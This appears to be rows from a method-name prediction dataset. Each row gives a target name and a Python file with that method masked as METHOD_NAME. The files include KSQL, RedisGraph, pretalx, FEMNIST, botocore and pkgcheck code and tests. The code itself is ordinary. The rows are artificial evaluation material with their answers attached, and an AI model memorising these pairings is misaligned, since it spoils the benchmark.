for block in step["stdin"]:
spool_file_name = str(uuid.uuid4()) + ".log"
spool_path = "/tmp/" + spool_file_name
f = in_base_dir(context, block["file"])
with open(f, "r") as handle:
commands = handle.readlines()
section = {
"group_name": get_file_name(f),
"spool_file_name": spool_file_name,
"spool_path": spool_path,
"spool_command": make_spool_command(spool_path),
"unspool_command": make_unspool_command(),
"column_width_command": make_column_width_command(column_width),
"commands": commands
}
result.append(section)
return result
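# Merge all sections into a single temporary command file, wrapping each group
# of commands in its spool/unspool directives so the CLI writes per-group logs.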
def consolidate_input_files(input_sections):
lines = []
for section in input_sections:
lines.append(section["column_width_command"])
lines.append(section["spool_command"])
for command in section["commands"]:
lines.append(command)
lines.append(section["unspool_command"])
consolidated_file = tempfile.NamedTemporaryFile(delete=False)
with open(consolidated_file.name, "w") as f:
for line in lines:
if line.strip() != "":
f.write(line.rstrip() + "\n")
return consolidated_file
def ksql_proc_state(input_sections):
result = {}
for section in input_sections:
result[section["group_name"]] = {
"spool_file_name": section["spool_file_name"],
"spool_path": section["spool_path"]
}
return result
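# Copy each group's spool file out of the container into a host temp directory
# using `docker cp`.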
def copy_spool_files_to_host(context, step, proc_state):
temp_dir = tempfile.mkdtemp()
for group_name, spool_context in proc_state.items():
path = spool_context["spool_path"]
cmd = shlex.split("docker cp %s:%s %s" % (step["container"], path, temp_dir))
subprocess.run(cmd, stdout=subprocess.PIPE)
return temp_dir
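# Reducer used below: start a new block whenever a line begins with the
# "ksql>" prompt, otherwise append the line to the current block.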
def split_io_blocks(coll, line):
if line.startswith("ksql>"):
coll.append([line])
else:
coll[-1].append(line)
return coll
def strip_input(coll):
result = []
for xs in coll:
result.append(list(dropwhile(lambda x: not x.endswith(";\n"), xs))[1:])
return result
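# Split the raw spool log into per-command blocks and drop the echoed input,
# keeping only each command's output.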
def shred_spool_text(text):
results = []
trim_start = next(i for i, x in enumerate(text) if x.startswith("ksql>"))
trimmed = text[trim_start:-2]
blocks = reduce(split_io_blocks, trimmed, [])
return strip_input(blocks)
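# For every group, shred its copied spool file into per-command chunks and
# write them to numbered output-<n>.log files under the configured stdout
# directory.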
def write_spool_text(context, step, proc_state, temp_dir):
for group_name, spool_context in proc_state.items():
f = str(temp_dir + "/" + spool_context["spool_file_name"])
with open(f, "r") as handle:
content = shred_spool_text(handle.readlines())
stdout_dir = step["stdout"]["directory"]
full_dir = in_base_dir(context, "%s/%s" % (stdout_dir, group_name))
os.makedirs(full_dir)
for index, chunk in enumerate(content):
seq_file = "output-" + str(index) + ".log"
base_file = "%s/%s" % (full_dir, seq_file)
with open(base_file, "w") as output_file:
output_file.write("".join(chunk).lstrip())
def copy_docker_ksql_cli_output(context, step, proc_state):
temp_dir = copy_spool_files_to_host(context, step, proc_state)
write_spool_text(context, step, proc_state, temp_dir)
return context
# This is a bad and terrible hack. When Docker is run with -it,
# which is needed for the KSQL CLI to work properly, Python
# can't talk to it over a subprocess. This method intercepts
# the -it flag and transforms it to -i to make it work. Yuck.
#
# See: https://stackoverflow.com/questions/43099116/error-the-input-device-is-not-a-tty
def intercept_tty(cmd_seq):
return ["-i" if x=="-it" else x for x in cmd_seq]
def run_docker_proc(context, step):
input_sections = build_input_sections(context, step)
stdin_file = consolidate_input_files(input_sections)
f = in_base_dir(context, step["docker_bootup_file"])
with open(f, 'r') as handle:
base_cmd = shlex.split(handle.read())
cmd_seq = intercept_tty(base_cmd)
proc = subprocess.run(cmd_seq, stdin=stdin_file, stdout=subprocess.PIPE)
return ksql_proc_state(input_sections)
def METHOD_NAME(context, step):
proc_state = run_docker_proc(context, step)
return copy_docker_ksql_cli_output(context, step, proc_state) | null |
path to string | from numbers import Number
from collections import Counter
from RLTest import Env
from redis.commands.graph import Graph
from redis.commands.graph.node import Node
from redis.commands.graph.edge import Edge
from redis.commands.graph.path import Path
# Returns True if value is a number or string representation of a number.
def is_numeric(value):
# check for value's type to be a number or a string
if not isinstance(value, (Number, str)):
return False
try:
# value is either number or string, try to convert to float
float(value)
# conversion succeed
return True
except ValueError:
# value was a string not representing a number
return False
def removeQuotes(value):
value = value.replace("'", "")
value = value.replace('"', "")
return value
def toNumeric(value):
value = float(value)
if value.is_integer():
value = int(value)
return value
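# Render a node in the TCK text form, e.g. a node with alias "a", label
# "Person" and property name=Bob becomes "(a:Person {name: Bob})".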
def nodeToString(value):
res = '('
if value.alias:
res += value.alias
if value.labels:
res += ':' + ":".join(value.labels)
if value.properties:
props = ', '.join(key+': '+str(val)
for key, val in value.properties.items())
if value.labels:
res += " "
res += '{' + props + '}'
res += ')'
value = res
return value
def edgeToString(value):
res = "["
if value.relation:
res += ":" + value.relation
if value.properties:
props = ', '.join(key+': '+str(val)
for key, val in value.properties.items())
if value.relation:
res += " "
res += '{' + props + '}'
res += ']'
value = res
return value
def listToString(listToConvert):
strValue = '['
strValue += ", ".join(map(lambda value: toString(value), listToConvert))
strValue += ']'
return strValue
def METHOD_NAME(pathToConvert):
strValue = "<"
nodes_count = pathToConvert.nodes_count()
for i in range(0, nodes_count - 1):
node = pathToConvert.get_node(i)
node_str = nodeToString(node)
edge = pathToConvert.get_relationship(i)
edge_str = edgeToString(edge)
strValue += node_str + "-" + edge_str + "->" if edge.src_node == node.id else node_str + "<-" + edge_str + "-"
strValue += nodeToString(pathToConvert.get_node(nodes_count - 1)) if nodes_count > 0 else ""
strValue += ">"
return strValue
def dictToString(dictToConvert):
size = len(dictToConvert)
strValue = '{'
for idx, item in enumerate(dictToConvert.items()):
strValue += item[0] + ": "
strValue += toString(item[1])
if idx < size - 1:
strValue += ", "
strValue += '}'
return strValue
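# Dispatch on the value's type and produce the canonical string form used when
# comparing results, e.g. True -> "true" and None -> "null".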
def toString(value):
if isinstance(value, bool):
if value is True:
return "true"
elif value is False:
return "false"
elif is_numeric(value):
return str(value)
elif isinstance(value, str):
# remove quotes if any
return removeQuotes(value)
# value is a node
elif isinstance(value, Node):
return nodeToString(value)
# value is an edge
elif isinstance(value, Edge):
return edgeToString(value)
elif isinstance(value, list):
return listToString(value)
elif isinstance(value, Path):
return METHOD_NAME(value)
elif isinstance(value, dict):
return dictToString(value)
elif value == None:
return "null"
# prepare the actual value returned from redisgraph to be in
# comparison variable format of the TCK feature files expected values
def prepareActualValue(actualValue):
# if value is a numeric string or a number, transform to numeric value
if is_numeric(actualValue):
actualValue = toNumeric(actualValue)
# value is string
elif isinstance(actualValue, str):
# remove quotes if any
actualValue = removeQuotes(actualValue)
# value is a node
elif isinstance(actualValue, Node):
actualValue = nodeToString(actualValue)
# value is an edge
elif isinstance(actualValue, Edge):
actualValue = edgeToString(actualValue)
elif isinstance(actualValue, list):
actualValue = listToString(actualValue)
elif isinstance(actualValue, Path):
actualValue = METHOD_NAME(actualValue)
elif isinstance(actualValue, dict):
actualValue = dictToString(actualValue)
else:
# actual value is null or boolean
Env.RTestInstance.currEnv.assertTrue(isinstance(actualValue, (type(None), bool)))
return actualValue
# prepare the expected value to be in comparison variable format
def prepareExpectedValue(expectedValue):
# the expected value is always a string, so do the string preparation
expectedValue = removeQuotes(expectedValue)
# in case of boolean value string
if expectedValue == "true":
expectedValue = True
elif expectedValue == "false":
expectedValue = False
elif expectedValue == "null":
expectedValue = None
# in case of numeric string
elif is_numeric(expectedValue):
expectedValue = toNumeric(expectedValue)
return expectedValue
def prepare_actual_row(row):
return tuple(prepareActualValue(cell) for cell in row)
def prepare_expected_row(row):
return tuple(prepareExpectedValue(cell) for cell in row)
def assert_empty_resultset(resultset):
Env.RTestInstance.currEnv.assertEquals(len(resultset.result_set), 0)
# check value of a designated statistic
def assert_statistics(resultset, stat, value):
if stat == "+nodes":
Env.RTestInstance.currEnv.assertEquals(resultset.nodes_created, value)
elif stat == "+relationships":
Env.RTestInstance.currEnv.assertEquals(resultset.relationships_created, value)
elif stat == "-relationships":
Env.RTestInstance.currEnv.assertEquals(resultset.relationships_deleted, value)
elif stat == "+labels":
Env.RTestInstance.currEnv.assertEquals(resultset.labels_added, value)
elif stat == "-labels":
Env.RTestInstance.currEnv.assertEquals(resultset.labels_removed, value)
elif stat == "+properties":
Env.RTestInstance.currEnv.assertEquals(resultset.properties_set, value)
elif stat == "-properties":
Env.RTestInstance.currEnv.assertEquals(resultset.properties_removed, value)
elif stat == "-nodes":
Env.RTestInstance.currEnv.assertEquals(resultset.nodes_deleted, value)
else:
print(stat)
Env.RTestInstance.currEnv.assertTrue(False)
# checks resultset statistics for no graph modifications
def assert_no_modifications(resultset):
Env.RTestInstance.currEnv.assertEquals(sum([resultset.nodes_created, resultset.nodes_deleted,
resultset.properties_set, resultset.relationships_created,
resultset.relationships_deleted]), 0)
def assert_resultset_length(resultset, length):
Env.RTestInstance.currEnv.assertEquals(len(resultset.result_set), length)
def assert_resultsets_equals_in_order(actual, expected):
rowCount = len(expected.rows)
# check amount of rows
assert_resultset_length(actual, rowCount)
for rowIdx in range(rowCount):
actualRow = prepare_actual_row(actual.result_set[rowIdx])
expectedRow = prepare_expected_row(expected.rows[rowIdx])
# compare rows
Env.RTestInstance.currEnv.assertEquals(actualRow, expectedRow)
def assert_resultsets_equals(actual, expected):
# Convert each row to a tuple, and maintain a count of how many times that row appears
actualCtr = Counter(prepare_actual_row(row) for row in actual.result_set)
expectedCtr = Counter(prepare_expected_row(row) for row in expected)
# Validate that the constructed Counters are equal
Env.RTestInstance.currEnv.assertEquals(actualCtr, expectedCtr) | null
get object | from django.http import Http404
from django.utils.functional import cached_property
from django_filters import rest_framework as filters
from django_scopes import scopes_disabled
from rest_framework import viewsets
from pretalx.api.serializers.submission import (
ScheduleListSerializer,
ScheduleSerializer,
SubmissionOrgaSerializer,
SubmissionReviewerSerializer,
SubmissionSerializer,
TagSerializer,
)
from pretalx.schedule.models import Schedule
from pretalx.submission.models import Submission, SubmissionStates, Tag
with scopes_disabled():
class SubmissionFilter(filters.FilterSet):
state = filters.MultipleChoiceFilter(choices=SubmissionStates.get_choices())
class Meta:
model = Submission
fields = ("state", "content_locale", "submission_type")
class SubmissionViewSet(viewsets.ReadOnlyModelViewSet):
serializer_class = SubmissionSerializer
queryset = Submission.objects.none()
lookup_field = "code__iexact"
search_fields = ("title", "speakers__name")
filterset_class = SubmissionFilter
def get_queryset(self):
if self.request._request.path.endswith(
"/talks/"
) or not self.request.user.has_perm(
"orga.view_submissions", self.request.event
):
if (
not self.request.user.has_perm(
"agenda.view_schedule", self.request.event
)
or not self.request.event.current_schedule
):
return Submission.objects.none()
return self.request.event.submissions.filter(
pk__in=self.request.event.current_schedule.talks.filter(
is_visible=True
).values_list("submission_id", flat=True)
)
return self.request.event.submissions.all()
def get_serializer_class(self):
if self.request.user.has_perm("orga.change_submissions", self.request.event):
return SubmissionOrgaSerializer
if self.request.user.has_perm("orga.view_submissions", self.request.event):
return SubmissionReviewerSerializer
return SubmissionSerializer
@cached_property
def serializer_questions(self):
return (self.request.query_params.get("questions") or "").split(",")
def get_serializer(self, *args, **kwargs):
can_view_speakers = self.request.user.has_perm(
"agenda.view_schedule", self.request.event
) or self.request.user.has_perm("orga.view_speakers", self.request.event)
if self.request.query_params.get("anon"):
can_view_speakers = False
return super().get_serializer(
*args,
can_view_speakers=can_view_speakers,
event=self.request.event,
questions=self.serializer_questions,
**kwargs,
)
class ScheduleViewSet(viewsets.ReadOnlyModelViewSet):
serializer_class = ScheduleSerializer
queryset = Schedule.objects.none()
lookup_value_regex = "[^/]+"
def get_serializer_class(self):
if self.action == "list":
return ScheduleListSerializer
return ScheduleSerializer # self.action == 'retrieve'
def METHOD_NAME(self):
schedules = self.get_queryset()
query = self.kwargs.get(self.lookup_field)
if query == "wip":
schedule = schedules.filter(version__isnull=True).first()
else:
if query == "latest" and self.request.event.current_schedule:
query = self.request.event.current_schedule.version
schedule = schedules.filter(version__iexact=query).first()
if not schedule:
raise Http404
return schedule
def get_queryset(self):
qs = self.queryset
is_public = (
self.request.event.is_public
and self.request.event.feature_flags["show_schedule"]
)
current_schedule = (
self.request.event.current_schedule.pk
if self.request.event.current_schedule
else None
)
if self.request.user.has_perm("orga.view_schedule", self.request.event):
return self.request.event.schedules.all()
if is_public:
return self.request.event.schedules.filter(pk=current_schedule)
return qs
class TagViewSet(viewsets.ReadOnlyModelViewSet):
serializer_class = TagSerializer
queryset = Tag.objects.none()
lookup_field = "tag__iexact"
def get_queryset(self):
if self.request.user.has_perm("orga.view_submissions", self.request.event):
return self.request.event.tags.all()
return Tag.objects.none() | null |
test | """Implementation of the model used for the FEMNIST experiments."""
from logging import INFO
from typing import Optional, Tuple
import torch
import torch.nn as nn
from flwr.common.logger import log
from torch import Tensor
from torch.utils.data import DataLoader
class Net(nn.Module):
"""Implementation of the model used in the LEAF paper for training on
FEMNIST data."""
# pylint: disable=too-many-instance-attributes
def __init__(self, num_classes: int) -> None:
super().__init__()
self.conv1 = nn.Conv2d(1, 32, kernel_size=5, padding="same")
self.relu1 = nn.ReLU()
self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2)
self.conv2 = nn.Conv2d(32, 64, kernel_size=5, padding="same")
self.relu2 = nn.ReLU()
self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2)
self.fc1 = nn.Linear(7 * 7 * 64, 2048)
self.relu3 = nn.ReLU()
self.fc2 = nn.Linear(2048, num_classes)
def forward(self, x: Tensor) -> Tensor:
"""Forward step in training."""
x = self.conv1(x)
x = self.relu1(x)
x = self.pool1(x)
x = self.conv2(x)
x = self.relu2(x)
x = self.pool2(x)
x = x.view(-1, 7 * 7 * 64)
x = self.fc1(x)
x = self.relu3(x)
x = self.fc2(x)
return x
# pylint: disable=too-many-arguments, too-many-locals, too-many-branches
def train(
net: nn.Module,
trainloader: DataLoader,
valloader: DataLoader,
epochs: Optional[int],
learning_rate: float,
device: torch.device,
n_batches: Optional[int] = None,
verbose: bool = False,
) -> Tuple[float, float, Optional[float], Optional[float]]:
"""Train a given model with CrossEntropy and SGD (or some version of it
like batch-SGD).
n_batches is an alternative way of specifying the training length
(instead of epochs)
"""
criterion = torch.nn.CrossEntropyLoss(reduction="sum")
optimizer = torch.optim.SGD(net.parameters(), lr=learning_rate)
net.train()
epoch_loss, epoch_acc = 0.0, 0.0
# pylint: disable=no-else-return
if epochs:
for epoch in range(epochs):
correct, total, epoch_loss = 0, 0, 0.0
for images, labels in trainloader:
correct, epoch_loss, total = train_step(
correct,
criterion,
device,
epoch_loss,
images,
labels,
net,
optimizer,
total,
)
epoch_loss = epoch_loss / total
epoch_acc = correct / total
if verbose:
log(
INFO,
"Epoch %s: train loss %s, accuracy %s",
str(epoch + 1),
str(epoch_loss),
str(epoch_acc),
)
# Train loss reported is typically the last epoch loss
train_loss, train_acc = epoch_loss, epoch_acc
if len(valloader):
val_loss, val_acc = METHOD_NAME(net, valloader, device)
else:
val_loss, val_acc = None, None
return train_loss, train_acc, val_loss, val_acc
elif n_batches:
# Training time given in number of batches not epochs
correct, total, train_loss = 0, 0, 0.0
for batch_idx, (images, labels) in enumerate(trainloader):
if batch_idx == n_batches:
break
correct, train_loss, total = train_step(
correct,
criterion,
device,
train_loss,
images,
labels,
net,
optimizer,
total,
)
train_acc = correct / total
train_loss = train_loss / total
if verbose:
log(
INFO,
"Batch len based training: train loss %s, accuracy %s",
str(train_loss),
str(train_acc),
)
if len(valloader):
val_loss, val_acc = METHOD_NAME(net, valloader, device)
else:
val_loss, val_acc = None, None
return train_loss, train_acc, val_loss, val_acc
else:
raise ValueError("either n_epochs or n_batches should be specified ")
def train_step(
correct: int,
criterion: nn.CrossEntropyLoss,
device: torch.device,
epoch_loss: float,
images: Tensor,
labels: Tensor,
net: nn.Module,
optimizer: torch.optim.SGD,
total: int,
) -> Tuple[int, float, int]:
"""Single train step.
Returns
-------
correct, epoch_loss, total: Tuple[int, float, int]
number of correctly predicted samples, sum of loss, total number of
samples
"""
images = images.to(device)
labels = labels.to(device)
optimizer.zero_grad()
outputs = net(images)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
epoch_loss += loss.item()
total += labels.size(0)
correct += (torch.max(outputs.data, 1)[1] == labels).sum().item()
return correct, float(epoch_loss), total
def METHOD_NAME(
net: nn.Module, dataloader: DataLoader, device: torch.device
) -> Tuple[float, float]:
"""Test - calculate metrics on the given dataloader."""
criterion = torch.nn.CrossEntropyLoss(reduction="sum")
if len(dataloader) == 0:
raise ValueError("Dataloader can't be 0, exiting...")
correct, total, loss = 0, 0, 0.0
net.eval()
with torch.no_grad():
for images, labels in dataloader:
images, labels = images.to(device), labels.to(device)
output = net(images)
loss += criterion(output, labels).item()
_, predicted = output.max(1)
total += labels.size(0)
correct += predicted.eq(labels).sum().item()
accuracy = correct / total
loss /= total
return float(loss), accuracy | null |
test handle | from pathlib import Path
from datetime import date
from io import StringIO
import os
import pytest
import boto3 # noqa
from django.core.management import call_command, CommandError
from django.utils import timezone
from sqlite_utils import Database
from ..models import SiteCheck
from ...accounts import models as ac_models
from ..management.commands.dump_green_domains import GreenDomainExporter
from ..models import GreencheckIp
from . import create_greendomain
def greencheck_sitecheck(
domain, hosting_provider: ac_models.Hostingprovider, green_ip: GreencheckIp
):
return SiteCheck(
url=domain,
ip="192.30.252.153",
data=True,
green=True,
hosting_provider_id=hosting_provider.id,
checked_at=timezone.now(),
match_type="ip",
match_ip_range=green_ip.id,
cached=True,
)
@pytest.fixture
def cleared_test_bucket(object_storage_bucket):
"""
Clears the test bucket. Adds a sanity check in case
we're not using a bucket with test in the name
(better than nothing)
"""
assert "test" in object_storage_bucket.name
[obj.delete() for obj in object_storage_bucket.objects.all() if obj]
return object_storage_bucket
@pytest.fixture
def object_storage_bucket(settings):
session = boto3.Session(region_name=settings.OBJECT_STORAGE_REGION)
object_storage = session.resource(
"s3",
endpoint_url=settings.OBJECT_STORAGE_ENDPOINT,
aws_access_key_id=settings.OBJECT_STORAGE_ACCESS_KEY_ID,
aws_secret_access_key=settings.OBJECT_STORAGE_SECRET_ACCESS_KEY,
)
return object_storage.Bucket(settings.DOMAIN_SNAPSHOT_BUCKET)
class TestGreenDomainExporter:
@pytest.mark.django_db(transaction=True)
def test_dump_green_domains(self, hosting_provider, green_ip, settings):
"""
Test that we can export to sqlite for use in other systems. By default pytest
cases happen inside a transaction for speed, but for this we want to commit
the transaction so the external commands in `db-to-sqlite` can see the
test data.
"""
# arrange
exporter = GreenDomainExporter()
sitecheck = greencheck_sitecheck("example.com", hosting_provider, green_ip)
create_greendomain(hosting_provider, sitecheck)
root = Path(settings.ROOT)
today = date.today()
db_path = f"green_urls_{today}.db"
conn_string = exporter.get_conn_string()
# act
exporter.export_to_sqlite(conn_string, db_path)
sqlite_db = Database(db_path)
# do we have our generated db?
Path.exists(root / db_path)
# is the table there?
assert "greendomain" in [table.name for table in sqlite_db.tables]
def test_delete_files(self) -> None:
exporter = GreenDomainExporter()
# Deletion of missing files shouldn't error.
assert exporter.delete_files("/tmp/non-existing.file") is None
fpaths = []
for fname in ("a.txt", "b.txt"):
fpath = f"/tmp/{fname}"
with open(fpath, "w") as fd:
fd.write(fname)
fpaths.append(fpath)
assert exporter.delete_files(*fpaths) is None
# The files must not exist after deletion.
for fpath in fpaths:
assert not Path(fpath).exists(), fpath
with pytest.raises(RuntimeError) as error:
exporter.delete_files("/tmp")
assert 'Failed to remove these files: "/tmp".' in str(error)
@pytest.mark.django_db
class TestDumpGreenDomainCommand:
@staticmethod
def _call_command(**kwargs) -> Path:
stdout = StringIO()
stderr = StringIO()
db_path = Path(f"green_urls_{date.today()}.db")
assert not db_path.exists(), "The DB dump must not exist upon creation."
call_command("dump_green_domains", stdout=stdout, stderr=stderr, **kwargs)
assert not stdout.getvalue()
assert not stderr.getvalue()
return db_path
def METHOD_NAME(self) -> None:
if os.path.exists(f"green_urls_{date.today()}.db"):
os.unlink(f"green_urls_{date.today()}.db")
db_path = self._call_command()
compressed_db_path = Path(f"{db_path}.gz")
assert (
db_path.exists()
), "The DB dump must persist on disk if `--upload` is not supplied."
assert (
not compressed_db_path.exists()
), "The compressed DB dump must not be created when `--upload` is not supplied."
# Add a 'teardown' step to remove the file generated by the test.
# Without this we can't run this test multiple times,
# as a leftover file can still be present.
os.unlink(db_path)
@pytest.mark.object_storage
@pytest.mark.smoke_test
def test_handle_with_update(self, cleared_test_bucket, settings, **kwargs) -> None:
"""
Check that this really has uploaded to the bucket we expect it to.
This test also ensures the default `compression_type` is `gzip`.
"""
archive_extension = kwargs.pop("archive_extension", "gz")
db_path = self._call_command(upload=True, **kwargs)
compressed_db_path = Path(f"{db_path}.{archive_extension}")
assert (
not db_path.exists()
), "The DB dump must not persist on disk if `--upload` is supplied."
assert (
not compressed_db_path.exists()
), "The compressed DB dump must not persist on disk if `--upload` is supplied."
def is_uploaded(fname: str) -> bool:
for obj in cleared_test_bucket.objects.all():
if obj.key.endswith(fname):
return True
return False
assert not is_uploaded(
db_path.name
), "The uncompressed DB dump must not be uploaded to object storage."
assert is_uploaded(
compressed_db_path.name
), "The compressed DB dump must be uploaded to object storage."
@pytest.mark.object_storage
@pytest.mark.smoke_test
def test_handle_with_update_and_gzip_compression_type(
self, cleared_test_bucket, settings
) -> None:
self.test_handle_with_update(
cleared_test_bucket,
settings,
compression_type="gzip",
archive_extension="gz",
)
@pytest.mark.object_storage
@pytest.mark.smoke_test
def test_handle_with_update_and_bzip2_compression_type(
self, cleared_test_bucket, settings
) -> None:
self.test_handle_with_update(
cleared_test_bucket,
settings,
compression_type="bzip2",
archive_extension="bz2",
)
@pytest.mark.object_storage
@pytest.mark.smoke_test
def test_handle_with_update_and_invalid_compression_type(
self, cleared_test_bucket, settings
) -> None:
with pytest.raises(CommandError) as error:
self.test_handle_with_update(
cleared_test_bucket,
settings,
compression_type="blah",
archive_extension="b",
)
assert 'The "blah" compression is not supported.' in str(error)
assert 'Use one of "gzip", "bzip2".' in str(error)
| null |
document auto populated param | # Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import re
from collections import namedtuple
def py_type_name(type_name):
"""Get the Python type name for a given model type.
>>> py_type_name('list')
'list'
>>> py_type_name('structure')
'dict'
:rtype: string
"""
return {
'blob': 'bytes',
'character': 'string',
'double': 'float',
'long': 'integer',
'map': 'dict',
'structure': 'dict',
'timestamp': 'datetime',
}.get(type_name, type_name)
def py_default(type_name):
"""Get the Python default value for a given model type.
>>> py_default('string')
'\'string\''
>>> py_default('list')
'[...]'
>>> py_default('unknown')
'...'
:rtype: string
"""
return {
'double': '123.0',
'long': '123',
'integer': '123',
'string': "'string'",
'blob': "b'bytes'",
'boolean': 'True|False',
'list': '[...]',
'map': '{...}',
'structure': '{...}',
'timestamp': 'datetime(2015, 1, 1)',
}.get(type_name, '...')
def get_official_service_name(service_model):
"""Generate the official name of an AWS Service
:param service_model: The service model representing the service
"""
official_name = service_model.metadata.get('serviceFullName')
short_name = service_model.metadata.get('serviceAbbreviation', '')
if short_name.startswith('Amazon'):
short_name = short_name[7:]
if short_name.startswith('AWS'):
short_name = short_name[4:]
if short_name and short_name.lower() not in official_name.lower():
official_name += f' ({short_name})'
return official_name
_DocumentedShape = namedtuple(
'DocumentedShape',
[
'name',
'type_name',
'documentation',
'metadata',
'members',
'required_members',
],
)
class DocumentedShape(_DocumentedShape):
"""Use this class to inject new shapes into a model for documentation"""
def __new__(
cls,
name,
type_name,
documentation,
metadata=None,
members=None,
required_members=None,
):
if metadata is None:
metadata = []
if members is None:
members = []
if required_members is None:
required_members = []
return super().__new__(
cls,
name,
type_name,
documentation,
metadata,
members,
required_members,
)
class AutoPopulatedParam:
def __init__(self, name, param_description=None):
self.name = name
self.param_description = param_description
if param_description is None:
self.param_description = (
'Please note that this parameter is automatically populated '
'if it is not provided. Including this parameter is not '
'required\n'
)
def METHOD_NAME(self, event_name, section, **kwargs):
"""Documents auto populated parameters
It will remove any required marks for the parameter, remove the
parameter from the example, and add a snippet about the parameter
being autopopulated in the description.
"""
if event_name.startswith('docs.request-params'):
if self.name in section.available_sections:
section = section.get_section(self.name)
if 'is-required' in section.available_sections:
section.delete_section('is-required')
description_section = section.get_section(
'param-documentation'
)
description_section.writeln(self.param_description)
elif event_name.startswith('docs.request-example'):
section = section.get_section('structure-value')
if self.name in section.available_sections:
section.delete_section(self.name)
class HideParamFromOperations:
"""Hides a single parameter from multiple operations.
This method will remove a parameter from documentation and from
examples. This method is typically used for things that are
automatically populated because a user would be unable to provide
a value (e.g., a checksum of a serialized XML request body)."""
def __init__(self, service_name, parameter_name, operation_names):
"""
:type service_name: str
:param service_name: Name of the service to modify.
:type parameter_name: str
:param parameter_name: Name of the parameter to modify.
:type operation_names: list
:param operation_names: Operation names to modify.
"""
self._parameter_name = parameter_name
self._params_events = set()
self._example_events = set()
# Build up the sets of relevant event names.
param_template = 'docs.request-params.%s.%s.complete-section'
example_template = 'docs.request-example.%s.%s.complete-section'
for name in operation_names:
self._params_events.add(param_template % (service_name, name))
self._example_events.add(example_template % (service_name, name))
def hide_param(self, event_name, section, **kwargs):
if event_name in self._example_events:
# Modify the structure value for example events.
section = section.get_section('structure-value')
elif event_name not in self._params_events:
return
if self._parameter_name in section.available_sections:
section.delete_section(self._parameter_name)
class AppendParamDocumentation:
"""Appends documentation to a specific parameter"""
def __init__(self, parameter_name, doc_string):
self._parameter_name = parameter_name
self._doc_string = doc_string
def append_documentation(self, event_name, section, **kwargs):
if self._parameter_name in section.available_sections:
section = section.get_section(self._parameter_name)
description_section = section.get_section('param-documentation')
description_section.writeln(self._doc_string)
_CONTROLS = {
'\n': '\\n',
'\r': '\\r',
'\t': '\\t',
'\b': '\\b',
'\f': '\\f',
}
# Combines all CONTROLS keys into a big or regular expression
_ESCAPE_CONTROLS_RE = re.compile('|'.join(map(re.escape, _CONTROLS)))
# Based on the match get the appropriate replacement from CONTROLS
_CONTROLS_MATCH_HANDLER = lambda match: _CONTROLS[match.group(0)]
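# Replace raw control characters in a string with their two-character escaped
# forms (e.g. a literal tab becomes "\t") so they display as text rather than
# as control characters.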
def escape_controls(value):
return _ESCAPE_CONTROLS_RE.sub(_CONTROLS_MATCH_HANDLER, value) | null |
test gentoo repo | import pytest
from pkgcheck import checks as checks_mod
from pkgcheck import objects, results
from ..misc import init_check
def test_checks():
"""Scan through all public checks and verify various aspects."""
for name, cls in objects.CHECKS.items():
assert cls.known_results, f"check class {name!r} doesn't define known results"
def test_keywords():
"""Scan through all public result keywords and verify various aspects."""
for name, cls in objects.KEYWORDS.items():
assert cls.level is not None, f"result class {name!r} missing level"
class TestMetadataError:
"""Test MetadataError attribute registry."""
def test_reregister_error(self):
with pytest.raises(ValueError, match="metadata attribute 'eapi' already registered"):
class InvalidEapi2(results.MetadataError, results.VersionResult):
attr = "eapi"
def test_register_missing_attr(self):
with pytest.raises(ValueError, match="class missing metadata attributes"):
class InvalidAttr(results.MetadataError, results.VersionResult):
pass
class TestGentooRepoCheck:
def test_non_gentoo_repo(self, tool, make_repo):
self.repo = make_repo()
args = ["scan", "--repo", self.repo.location]
options, _ = tool.parse_args(args)
with pytest.raises(checks_mod.SkipCheck, match="not running against gentoo repo"):
init_check(checks_mod.GentooRepoCheck, options)
def METHOD_NAME(self, tool, make_repo):
self.repo = make_repo(repo_id="gentoo")
args = ["scan", "--repo", self.repo.location]
options, _ = tool.parse_args(args)
assert init_check(checks_mod.GentooRepoCheck, options)
class TestOverlayCheck:
def test_non_overlay_repo(self, tool, testconfig):
tool.parser.set_defaults(config_path=testconfig)
options, _ = tool.parse_args(["scan", "--repo", "gentoo"])
with pytest.raises(checks_mod.SkipCheck, match="not running against overlay"):
init_check(checks_mod.OverlayRepoCheck, options)
def test_overlay_repo(self, tool, testconfig):
tool.parser.set_defaults(config_path=testconfig)
options, _ = tool.parse_args(["scan", "--repo", "overlay"])
assert init_check(checks_mod.OverlayRepoCheck, options)
class TestGitCommitsCheck:
@pytest.fixture(autouse=True)
def _setup(self, tool, make_repo, make_git_repo):
# initialize parent repo
self.parent_git_repo = make_git_repo()
self.parent_repo = make_repo(self.parent_git_repo.path, repo_id="gentoo", arches=["amd64"])
self.parent_git_repo.add_all("initial commit")
# initialize child repo
self.child_git_repo = make_git_repo()
self.child_git_repo.run(["git", "remote", "add", "origin", self.parent_git_repo.path])
self.child_git_repo.run(["git", "pull", "origin", "main"])
self.child_git_repo.run(["git", "remote", "set-head", "origin", "main"])
self.child_repo = make_repo(self.child_git_repo.path)
def test_no_commits_option(self, tool, make_git_repo):
options, _ = tool.parse_args(["scan", "--repo", self.child_repo.location])
with pytest.raises(checks_mod.SkipCheck, match="not scanning against git commits"):
init_check(checks_mod.GitCommitsCheck, options)
def test_commits_option(self, tool, make_repo):
self.child_repo.create_ebuild("cat/pkg-1")
self.child_git_repo.add_all("cat/pkg-1")
options, _ = tool.parse_args(["scan", "--repo", self.child_repo.location, "--commits"])
assert init_check(checks_mod.GitCommitsCheck, options)
def test_no_local_commits(self, tool):
with pytest.raises(SystemExit) as excinfo:
tool.parse_args(["scan", "--repo", self.child_repo.location, "--commits"])
assert excinfo.value.code == 0
# parent repo has new commits
self.parent_repo.create_ebuild("cat/pkg-1")
self.parent_git_repo.add_all("cat/pkg-1")
self.child_git_repo.run(["git", "pull", "origin", "main"])
with pytest.raises(SystemExit) as excinfo:
tool.parse_args(["scan", "--repo", self.child_repo.location, "--commits"])
assert excinfo.value.code == 0
class TestNetworkCheck:
def test_network_disabled(self, tool):
options, _ = tool.parse_args(["scan"])
